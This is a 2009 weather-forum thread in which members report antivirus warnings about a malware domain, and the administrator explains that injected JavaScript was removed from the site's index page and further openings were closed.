Author Topic: !! to all ADMINS !!  (Read 16431 times)

0 Members and 1 Guest are viewing this topic.

Offline ncpilot

  • Forecaster
  • *****
  • Posts: 937
    • Monkey Junction Weather
!! to all ADMINS !!
« on: March 16, 2009, 08:52:18 AM »
Thought this might be the easiest way to contact you all...

Just now, when going to this forum directly by typing the URL, I'm getting multiple warnings from Trend Micro (work computer) for:

bamrot.com/qqp/index.php

Google even flags it as dangerous...

Never seen this before.

Has the forum site been hacked?
Marc
Wilmington, NC
"Monkey Junction Weather"
Davis VP2 wireless, WeatherLink

Offline Bushman

  • Forecaster
  • *****
  • Posts: 7549
    • Eagle Bay Weather
Re: !! to all ADMINS !!
« Reply #1 on: March 16, 2009, 09:14:59 AM »
I just tried it on a new load of FF and no such warnings.   Running SAV abd Win Firewall.  Maybe YOU'VE been hacked?
Need low cost IP monitoring?  http://wirelesstag.net/wta.aspx?link=NisJxz6FhUa4V67/cwCRWA or PM me for 50% off Wirelesstags!!

Offline ncpilot

  • Forecaster
  • *****
  • Posts: 937
    • Monkey Junction Weather
Re: !! to all ADMINS !!
« Reply #2 on: March 16, 2009, 09:33:28 AM »
No other website I load gives that warning...

Try looking that site up in Google...
Marc
Wilmington, NC
"Monkey Junction Weather"
Davis VP2 wireless, WeatherLink

Offline Bushman

  • Forecaster
  • *****
  • Posts: 7549
    • Eagle Bay Weather
Re: !! to all ADMINS !!
« Reply #3 on: March 16, 2009, 09:38:12 AM »
I did.  It uses an ActiveX component.  Have you run a spyware scan on your system?  I don't get any such report accessing this or other sites.
Need low cost IP monitoring?  http://wirelesstag.net/wta.aspx?link=NisJxz6FhUa4V67/cwCRWA or PM me for 50% off Wirelesstags!!

Offline mackbig

  • Forecaster
  • *****
  • Posts: 4128
    • Mackie's Main Street, Unionville, ON Canada Weather
Re: !! to all ADMINS !!
« Reply #4 on: March 16, 2009, 09:59:30 AM »
That site is an apparently known malware site, hence the google warning.

I am confused, I thought when trying to access this forum you got a warning about "bamrot.com/qqp/index.php"

I have not seen any warnings this morning for the forum.  I went to the above site, prior to googling it, nothing loaded, I assume our massive corporate firewall has it on a black list.

Andrew

Andrew - Davis VP2+ 6163, serial weatherlink, wireless anemometer, running Weather Display.  Boltek PCI Stormtracker, Astrogenic Nexstorm, Strikestar - UNI, CWOP CW8618, GrLevel3, (Station 2 OS WMR968, VWS 13.01p09), Windows 7-64

Offline ncpilot

  • Forecaster
  • *****
  • Posts: 937
    • Monkey Junction Weather
Re: !! to all ADMINS !!
« Reply #5 on: March 16, 2009, 10:20:12 AM »
You may have "silent" warnings...

I've got Trend Micro (for better or worse--it's what corporate uses) on my laptop, and every time I refresh or navigate on this forum, a window pops up warning about bamrot...

Just did a scan of my computer, and it's clean...

I'm using an older version of Firefox for a thumbdrive (and yes, I scanned my thumbdrive), so maybe FF 3 blocks the site?

I remoted into my home computer and went to this forum using FF 3, with AVG antivirus running, and I did not get a warning...
Marc
Wilmington, NC
"Monkey Junction Weather"
Davis VP2 wireless, WeatherLink

Offline ncpilot

  • Forecaster
  • *****
  • Posts: 937
    • Monkey Junction Weather
Re: !! to all ADMINS !!
« Reply #6 on: March 16, 2009, 10:30:40 AM »
Warnings have gone away...

I see saratogawx is also online... maybe he fixed something?
Marc
Wilmington, NC
"Monkey Junction Weather"
Davis VP2 wireless, WeatherLink

Offline Anthony

  • Forecaster
  • *****
  • Posts: 1707
    • Anthony's Weather
Re: !! to all ADMINS !!
« Reply #7 on: March 16, 2009, 10:30:45 AM »
I run AVG and win xp pro and have not gotten any warnings either.



Thanks,
Anthony
WB8YUE

Offline NGRRFan

  • Senior Member
  • **
  • Posts: 57
Re: !! to all ADMINS !!
« Reply #8 on: March 16, 2009, 10:41:19 AM »
Kaspersky also says there is a virus at this site.

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #9 on: March 16, 2009, 10:53:28 AM »
It was a problem.. a JavaScript malware code was appended to the index.php on this site.  It's now removed.

We're doing some forensics to see how it arrived on the site.

Thanks for the alert(s) that were sent.

I find that FireFox with NoScript absolutely prevents this kind of thing from penetrating my client .. I get a nice 'script blocked' indicator, then I can check which domain the script is trying to execute to, and it's easy to track down the malware. :)

Best regards,
Ken
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Offline sam2004gp

  • Mount Crawford, Virginia
  • Forecaster
  • *****
  • Posts: 2865
  • Weeeeeeeee!!!!
    • Mount Crawford Weather, VA
Re: !! to all ADMINS !!
« Reply #10 on: March 16, 2009, 12:17:28 PM »
Thanks for fixing it guys.  Glad I waited until now to log in.
SAM --->>> http://www.mountcrawfordweather.org
OS WMR-968 with a Dedicated PWS Weather Computer running VWS v13.01 p09


Offline lddaly

  • Forecaster
  • *****
  • Posts: 490
Re: !! to all ADMINS !!
« Reply #11 on: March 16, 2009, 01:38:58 PM »
If we visited the site while it was infected, what actions do we need to take? What are the details of the specific Malware that we can look for?

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #12 on: March 16, 2009, 01:41:35 PM »
If you have current anti-virus software or were using FF with NoScript, then no action is required.  Otherwise, update your anti-virus and run a system scan to make sure nothing untoward entered your system.

I'm still hunting down the source of the infection.
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Offline tweatherman

  • Forecaster
  • *****
  • Posts: 537
Re: !! to all ADMINS !!
« Reply #13 on: March 16, 2009, 03:07:29 PM »
I got several spyware warnings on this site yesterday from webroot spyware running on my computer yesterday. Since have been removed on my end.

Tim

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #14 on: March 16, 2009, 03:22:06 PM »
I think we've found the source of the problem and plugged it, so with any luck, we won't see a re-infestation.

Please accept our apologies for any inconvenience caused by this malware infestation.

Best regards,
Ken
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Offline WeatherBeacon

  • Chief
  • Forecaster
  • *****
  • Posts: 1369
    • http://www.wxbeacon.com
Re: !! to all ADMINS !!
« Reply #15 on: March 16, 2009, 04:53:03 PM »
I think we've found the source of the problem and plugged it, so with any luck, we won't see a re-infestation.

Please accept our apologies for any inconvenience caused by this malware infestation.

Best regards,
Ken

Good work, Ken, and whomever else was involved. Thanks for your diligence and hard work! =D>
Mae govannen!
Kevin  (Member AMS) http://www.wxbeacon.com               Genesee County, Michigan
Hardware:  Davis Vantage Pro Wireless, Midland WR-300
Software: VWS 14.01p43, WeatherFlash, & GRLevel3

Offline racenet

  • Forecaster
  • *****
  • Posts: 1306
    • NH Weather Data
Re: !! to all ADMINS !!
« Reply #16 on: March 16, 2009, 07:15:20 PM »
Maybe not quite wiped out. Just got a warning via AVG. The first one today. Had 3 yesterday.



Bob
www.theamericanflagstore.com - The American Flag Store



www.nhweatherdata.com - NH Weather Data

Offline W3DRM

  • Forecaster
  • *****
  • Posts: 3360
    • Emmett Weather
Re: !! to all ADMINS !!
« Reply #17 on: March 16, 2009, 07:39:53 PM »
Ken,

I also got the warning via AVG about an hour ago when I first logged into WXForum.net. AVG caught it and let me quarantine it. Doesn't look like it did any damage though.

Thanks for the quick work in isolating the problem.
Don - W3DRM - Emmett, Idaho --- Blitzortung ID: 808 --- FlightRadar24 ID: F-KBOI7
Davis Wireless VP2, WD 10.37s150,
StartWatch, VirtualVP, VPLive, Win10 Pro
--- Logitech HD Pro C920 webcam (off-line)
--- RIPE Atlas Probe - 32849

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #18 on: March 16, 2009, 07:48:10 PM »
Found another opening... getting plugged now. Grrrr.  this miscreant is persistent.

Thanks for keeping your 'shields up' and for your patience while we battle the infestation.

Best regards,
Ken
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Offline WeatherBeacon

  • Chief
  • Forecaster
  • *****
  • Posts: 1369
    • http://www.wxbeacon.com
Re: !! to all ADMINS !!
« Reply #19 on: March 16, 2009, 07:51:11 PM »
Ken,

I also got the warning via AVG about an hour ago when I first logged into WXForum.net. AVG caught it and let me quarantine it. Doesn't look like it did any damage though.

Thanks for the quick work in isolating the problem.

Don, what settings to you use? I have AVG, and it isn't catching anything. Makes me wonder if I need to tighten it up.

Thanks!
Mae govannen!
Kevin  (Member AMS) http://www.wxbeacon.com               Genesee County, Michigan
Hardware:  Davis Vantage Pro Wireless, Midland WR-300
Software: VWS 14.01p43, WeatherFlash, & GRLevel3

Offline kray1000

  • Purveyor of wry
  • Forecaster
  • *****
  • Posts: 1336
    • http://www.roanokevalleyweather.com
Re: !! to all ADMINS !!
« Reply #20 on: March 16, 2009, 07:54:52 PM »
I have McAfee and I'm not getting any alerts (even silent ones, I don't think).  What are folks doing to trigger the alerts?

(BTW... I use a bookmark to access the forum.)

Offline saratogaWX

  • Administrator
  • Forecaster
  • *****
  • Posts: 9257
  • Saratoga, CA, USA Weather - free PHP scripts
    • Saratoga-Weather.org
Re: !! to all ADMINS !!
« Reply #21 on: March 16, 2009, 07:55:27 PM »
I also have AVG, but it doesn't activate since the NoScript as part of my Firefox never lets the resulting script execute fully :)

The target site for the script has already been sequestered by the Google Firefox plugin as a 'bad site', and the target site is listed in malwarebytes.com too .. The target site no longer coughs up the 'real payload' (which is a good thing).

Incredibly annoying .. it's like playing 'whack-a-mole' .. exciting, but not always 'final'.
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Offline WeatherBeacon

  • Chief
  • Forecaster
  • *****
  • Posts: 1369
    • http://www.wxbeacon.com
Re: !! to all ADMINS !!
« Reply #22 on: March 16, 2009, 08:44:11 PM »

I don't mean to sound paranoid or alarmist, but do some of the fonts on the forum seem smaller? For example, the fonts in the menu tabs and some of the links seem smaller today than in the past. I don't believe I did anything to change my screen resolution. Anyone else notice that, or is it my imagination?
Mae govannen!
Kevin  (Member AMS) http://www.wxbeacon.com               Genesee County, Michigan
Hardware:  Davis Vantage Pro Wireless, Midland WR-300
Software: VWS 14.01p43, WeatherFlash, & GRLevel3

Offline kray1000

  • Purveyor of wry
  • Forecaster
  • *****
  • Posts: 1336
    • http://www.roanokevalleyweather.com
Re: !! to all ADMINS !!
« Reply #23 on: March 16, 2009, 08:53:37 PM »
Large fonts are getting more expensive. 

Myself, I can't see a difference.  Everything seems the same.

For some reason, I have this uncontrollable urge to whack a mole.

Offline WeatherBeacon

  • Chief
  • Forecaster
  • *****
  • Posts: 1369
    • http://www.wxbeacon.com
Re: !! to all ADMINS !!
« Reply #24 on: March 16, 2009, 09:02:55 PM »
Large fonts are getting more expensive. 

Myself, I can't see a difference.  Everything seems the same.

For some reason, I have this uncontrollable urge to whack a mole.

He he he!

As I'm still recovering from a 3-week cold or flu or combo thereof, I'm still thinking over "coughs up the 'real payload'." :-& :lol:
Mae govannen!
Kevin  (Member AMS) http://www.wxbeacon.com               Genesee County, Michigan
Hardware:  Davis Vantage Pro Wireless, Midland WR-300
Software: VWS 14.01p43, WeatherFlash, & GRLevel3